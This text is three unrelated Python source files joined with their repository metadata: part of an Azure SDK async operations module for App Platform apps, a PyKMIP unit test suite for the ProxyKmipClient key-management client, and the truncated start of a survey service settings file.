:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
service_name: str,
app_name: str,
app_resource: "_models.AppResource",
**kwargs: Any
) -> "_models.AppResource":
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(app_resource, 'AppResource')
request = build_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
service_name: str,
app_name: str,
app_resource: "_models.AppResource",
**kwargs: Any
) -> AsyncLROPoller["_models.AppResource"]:
"""Operation to update an exiting App.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:param app_resource: Parameters for the update operation.
:type app_resource: ~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AppResource or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResource"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
app_resource=app_resource,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('AppResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}"} # type: ignore
@distributed_trace
def list(
self,
resource_group_name: str,
service_name: str,
**kwargs: Any
) -> AsyncIterable["_models.AppResourceCollection"]:
"""Handles requests to list all resources in a Service.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppResourceCollection or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.appplatform.v2021_06_01_preview.models.AppResourceCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppResourceCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
api_version=api_version,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
api_version=api_version,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AppResourceCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps"} # type: ignore
@distributed_trace_async
async def get_resource_upload_url(
self,
resource_group_name: str,
service_name: str,
app_name: str,
**kwargs: Any
) -> "_models.ResourceUploadDefinition":
"""Get an resource upload URL for an App, which may be artifacts or source archive.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceUploadDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.appplatform.v2021_06_01_preview.models.ResourceUploadDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceUploadDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
request = build_get_resource_upload_url_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
template_url=self.get_resource_upload_url.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ResourceUploadDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_resource_upload_url.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}/getResourceUploadUrl"} # type: ignore
@distributed_trace_async
async def validate_domain(
self,
resource_group_name: str,
service_name: str,
app_name: str,
validate_payload: "_models.CustomDomainValidatePayload",
**kwargs: Any
) -> "_models.CustomDomainValidateResult":
"""Check the resource name is valid as well as not in use.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param service_name: The name of the Service resource.
:type service_name: str
:param app_name: The name of the App resource.
:type app_name: str
:param validate_payload: Custom domain payload to be validated.
:type validate_payload:
~azure.mgmt.appplatform.v2021_06_01_preview.models.CustomDomainValidatePayload
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CustomDomainValidateResult, or the result of cls(response)
:rtype: ~azure.mgmt.appplatform.v2021_06_01_preview.models.CustomDomainValidateResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CustomDomainValidateResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-06-01-preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(validate_payload, 'CustomDomainValidatePayload')
request = build_validate_domain_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
service_name=service_name,
app_name=app_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.validate_domain.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CustomDomainValidateResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
validate_domain.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/apps/{appName}/validateDomain"} # type: ignore
| {
"content_hash": "dd3c939b8257a0989f387d87d3977a6e",
"timestamp": "",
"source": "github",
"line_count": 709,
"max_line_length": 250,
"avg_line_length": 45.21156558533145,
"alnum_prop": 0.6418655435969427,
"repo_name": "Azure/azure-sdk-for-python",
"id": "e4832b4a1e8d1e92d78f681ccb37c5fbb809b4d1",
"size": "32555",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/appplatform/azure-mgmt-appplatform/azure/mgmt/appplatform/v2021_06_01_preview/aio/operations/_apps_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import mock
import six
import ssl
import testtools
from kmip.core import attributes as attr
from kmip.core import enums
from kmip.core import objects as obj
from kmip.core.factories import attributes
from kmip.core.messages import contents
from kmip.services.kmip_client import KMIPProxy
from kmip.services import results
from kmip.pie.client import ProxyKmipClient
from kmip.pie.exceptions import ClientConnectionFailure
from kmip.pie.exceptions import ClientConnectionNotOpen
from kmip.pie.exceptions import KmipOperationFailure
from kmip.pie import factory
from kmip.pie import objects
class TestProxyKmipClient(testtools.TestCase):
"""
Test suite for the ProxyKmipClient.
"""
def setUp(self):
super(TestProxyKmipClient, self).setUp()
self.attribute_factory = attributes.AttributeFactory()
def tearDown(self):
super(TestProxyKmipClient, self).tearDown()
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_init(self):
"""
Test that a ProxyKmipClient can be constructed with valid arguments.
"""
ProxyKmipClient(
hostname='127.0.0.1',
port=5696,
cert='/example/path/to/cert',
key='/example/path/to/key',
ca='/example/path/to/ca',
ssl_version=ssl.PROTOCOL_TLSv1,
username='username',
password='password',
config='test')
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_open(self):
"""
Test that the client can open a connection.
"""
client = ProxyKmipClient()
client.open()
client.proxy.open.assert_called_with()
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_open_on_open(self):
"""
Test that a ClientConnectionFailure exception is raised when trying
to open an opened client connection.
"""
client = ProxyKmipClient()
client.open()
self.assertRaises(ClientConnectionFailure, client.open)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_open_on_proxy_failure(self):
"""
Test that an Exception is raised when an error occurs while opening
the client proxy connection.
"""
client = ProxyKmipClient()
client.proxy.open.side_effect = Exception
self.assertRaises(Exception, client.open)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_close(self):
"""
Test that the client can close an open connection.
"""
client = ProxyKmipClient()
client.open()
client.close()
client.proxy.close.assert_called_with()
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_close_on_close(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to close a closed client connection.
"""
client = ProxyKmipClient()
self.assertRaises(ClientConnectionNotOpen, client.close)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_close_on_proxy_failure(self):
"""
Test that an Exception is raised when an error occurs while closing
the client proxy connection.
"""
client = ProxyKmipClient()
client._is_open = True
client.proxy.close.side_effect = Exception
self.assertRaises(Exception, client.close)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_enter(self):
"""
Test the result and effect of the enter method for the context
manager.
"""
client = ProxyKmipClient()
self.assertFalse(client._is_open)
result = client.__enter__()
self.assertEqual(result, client)
self.assertTrue(client._is_open)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_exit(self):
"""
Test the result and effect of the exit method for the context
manager.
"""
client = ProxyKmipClient()
client.__enter__()
self.assertTrue(client._is_open)
client.__exit__(None, None, None)
self.assertFalse(client._is_open)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_context_manager(self):
"""
Test that the KmipClient can be used by the with-statement as a
context manager.
"""
with ProxyKmipClient() as client:
self.assertTrue(client._is_open)
client.proxy.open.assert_called_with()
self.assertFalse(client._is_open)
client.proxy.close.assert_called_with()
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create(self):
"""
Test that a symmetric key can be created with proper inputs and that
its UID is returned properly.
"""
# Create the template to test the create call
algorithm = enums.CryptographicAlgorithm.AES
length = 256
algorithm_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM, algorithm)
length_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH, length)
mask_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT])
attributes = [algorithm_attribute, length_attribute, mask_attribute]
template = obj.TemplateAttribute(attributes=attributes)
key_id = 'aaaaaaaa-1111-2222-3333-ffffffffffff'
status = enums.ResultStatus.SUCCESS
result = results.CreateResult(
contents.ResultStatus(status),
uuid=attr.UniqueIdentifier(key_id))
with ProxyKmipClient() as client:
client.proxy.create.return_value = result
uid = client.create(algorithm, length)
client.proxy.create.assert_called_with(
enums.ObjectType.SYMMETRIC_KEY, template)
self.assertIsInstance(uid, six.string_types)
self.assertEqual(uid, key_id)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_on_invalid_algorithm(self):
"""
Test that a TypeError exception is raised when trying to create a
symmetric key with an invalid algorithm.
"""
args = ['invalid', 256]
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.create, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_on_invalid_length(self):
"""
Test that a TypeError exception is raised when trying to create a
symmetric key with an invalid length.
"""
args = [enums.CryptographicAlgorithm.AES, 'invalid']
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.create, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to create a symmetric key on an unopened client connection.
"""
client = ProxyKmipClient()
args = [enums.CryptographicAlgorithm.AES, 256]
self.assertRaises(
ClientConnectionNotOpen, client.create, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
the backend fails to create a symmetric key.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
client = ProxyKmipClient()
client.open()
client.proxy.create.return_value = result
args = [enums.CryptographicAlgorithm.AES, 256]
self.assertRaisesRegexp(
KmipOperationFailure, error_msg, client.create, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair(self):
"""
Test that an asymmetric key pair can be created with proper inputs
and that the UIDs of the public and private keys are returned
properly.
"""
# Create the template to test the create key pair call
algorithm = enums.CryptographicAlgorithm.RSA
length = 2048
algorithm_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM, algorithm)
length_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH, length)
mask_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT])
attributes = [algorithm_attribute, length_attribute, mask_attribute]
template = obj.CommonTemplateAttribute(attributes=attributes)
status = enums.ResultStatus.SUCCESS
result = results.CreateKeyPairResult(
contents.ResultStatus(status),
public_key_uuid=attr.PublicKeyUniqueIdentifier(
'aaaaaaaa-1111-2222-3333-ffffffffffff'),
private_key_uuid=attr.PrivateKeyUniqueIdentifier(
'ffffffff-3333-2222-1111-aaaaaaaaaaaa'))
with ProxyKmipClient() as client:
client.proxy.create_key_pair.return_value = result
public_uid, private_uid = client.create_key_pair(
enums.CryptographicAlgorithm.RSA, 2048)
kwargs = {'common_template_attribute': template}
client.proxy.create_key_pair.assert_called_with(**kwargs)
self.assertIsInstance(public_uid, six.string_types)
self.assertIsInstance(private_uid, six.string_types)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair_on_invalid_algorithm(self):
"""
Test that a TypeError exception is raised when trying to create an
asymmetric key pair with an invalid algorithm.
"""
args = ['invalid', 256]
with ProxyKmipClient() as client:
self.assertRaises(
TypeError, client.create_key_pair, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair_on_invalid_length(self):
"""
Test that a TypeError exception is raised when trying to create an
asymmetric key pair with an invalid length.
"""
args = [enums.CryptographicAlgorithm.AES, 'invalid']
with ProxyKmipClient() as client:
self.assertRaises(
TypeError, client.create_key_pair, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to create an asymmetric key pair on an unopened client connection.
"""
client = ProxyKmipClient()
args = [enums.CryptographicAlgorithm.RSA, 2048]
self.assertRaises(
ClientConnectionNotOpen, client.create_key_pair, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
backend fails to create an asymmetric key pair.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
client = ProxyKmipClient()
client.open()
client.proxy.create_key_pair.return_value = result
args = [enums.CryptographicAlgorithm.RSA, 2048]
self.assertRaisesRegexp(
KmipOperationFailure, error_msg,
client.create_key_pair, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_get(self):
"""
Test that a secret can be retrieved with proper input.
"""
# Key encoding obtained from Section 14.2 of the KMIP 1.1 test
# documentation.
secret = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES,
128,
(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F'))
fact = factory.ObjectFactory()
result = results.GetResult(
contents.ResultStatus(enums.ResultStatus.SUCCESS),
uuid=attr.PublicKeyUniqueIdentifier(
'aaaaaaaa-1111-2222-3333-ffffffffffff'),
secret=fact.convert(secret))
with ProxyKmipClient() as client:
client.proxy.get.return_value = result
result = client.get('aaaaaaaa-1111-2222-3333-ffffffffffff')
client.proxy.get.assert_called_with(
'aaaaaaaa-1111-2222-3333-ffffffffffff')
self.assertIsInstance(result, objects.SymmetricKey)
self.assertEqual(result, secret)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_get_on_invalid_uid(self):
"""
Test that a TypeError exception is raised when trying to retrieve a
secret with an invalid ID.
"""
args = [0]
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.get, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_get_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to retrieve a secret on an unopened client connection.
"""
client = ProxyKmipClient()
args = ['aaaaaaaa-1111-2222-3333-ffffffffffff']
self.assertRaises(ClientConnectionNotOpen, client.get, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_get_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
backend fails to retrieve a secret.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
client = ProxyKmipClient()
client.open()
client.proxy.get.return_value = result
args = ['id']
self.assertRaisesRegexp(
KmipOperationFailure, error_msg, client.get, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_destroy(self):
"""
Test that the client can destroy a secret.
"""
status = enums.ResultStatus.SUCCESS
result = results.OperationResult(contents.ResultStatus(status))
with ProxyKmipClient() as client:
client.proxy.destroy.return_value = result
result = client.destroy(
'aaaaaaaa-1111-2222-3333-ffffffffffff')
client.proxy.destroy.assert_called_with(
'aaaaaaaa-1111-2222-3333-ffffffffffff')
self.assertEqual(None, result)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_destroy_on_invalid_uid(self):
"""
Test that a TypeError exception is raised when trying to destroy a
secret with an invalid ID.
"""
args = [0]
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.destroy, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_destroy_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to destroy a secret on an unopened client connection.
"""
client = ProxyKmipClient()
args = ['aaaaaaaa-1111-2222-3333-ffffffffffff']
self.assertRaises(
ClientConnectionNotOpen, client.destroy, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_destroy_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
backend fails to destroy a secret.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
client = ProxyKmipClient()
client.open()
client.proxy.destroy.return_value = result
args = ['id']
self.assertRaisesRegexp(
KmipOperationFailure, error_msg, client.destroy, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_register(self):
"""
Test that the client can register a key.
"""
key = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES,
128,
(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F'))
result = results.RegisterResult(
contents.ResultStatus(enums.ResultStatus.SUCCESS),
uuid=attr.PublicKeyUniqueIdentifier(
'aaaaaaaa-1111-2222-3333-ffffffffffff'))
with ProxyKmipClient() as client:
client.proxy.register.return_value = result
uid = client.register(key)
self.assertTrue(client.proxy.register.called)
self.assertIsInstance(uid, six.string_types)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_register_on_invalid_uid(self):
"""
Test that a TypeError exception is raised when trying to register a
key with an invalid key object.
"""
args = ['invalid']
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.register, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_register_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to register a key on an unopened client connection.
"""
key = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES,
128,
(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F'))
client = ProxyKmipClient()
args = [key]
self.assertRaises(ClientConnectionNotOpen, client.register, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_register_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
backend fails to register a key.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
# Key encoding obtained from Section 14.2 of the KMIP 1.1 test
# documentation.
key_value = (
b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F')
key = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES, 128, key_value)
client = ProxyKmipClient()
client.open()
client.proxy.register.return_value = result
args = [key]
self.assertRaisesRegexp(
KmipOperationFailure, error_msg, client.register, *args)
| {
"content_hash": "3f54d2affeef3995cdb3700faefceb1c",
"timestamp": "",
"source": "github",
"line_count": 584,
"max_line_length": 76,
"avg_line_length": 37.542808219178085,
"alnum_prop": 0.6285062713797035,
"repo_name": "dmend/PyKMIP",
"id": "92fce568b29c3b0a50258f801ce99a8703472b0e",
"size": "22571",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kmip/tests/unit/pie/test_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1202704"
},
{
"name": "Shell",
"bytes": "80"
}
],
"symlink_target": ""
} |
'''
Created on Sep 21, 2015
@author: fteychene
'''
import os
from survey.settings import SurveyConfiguration
from result.settings import ResultConfiguration
SETTINGS = {
'DOMAIN': {
'survey': SurveyConfiguration.domain(),
'results': ResultConfiguration.domain(),
},
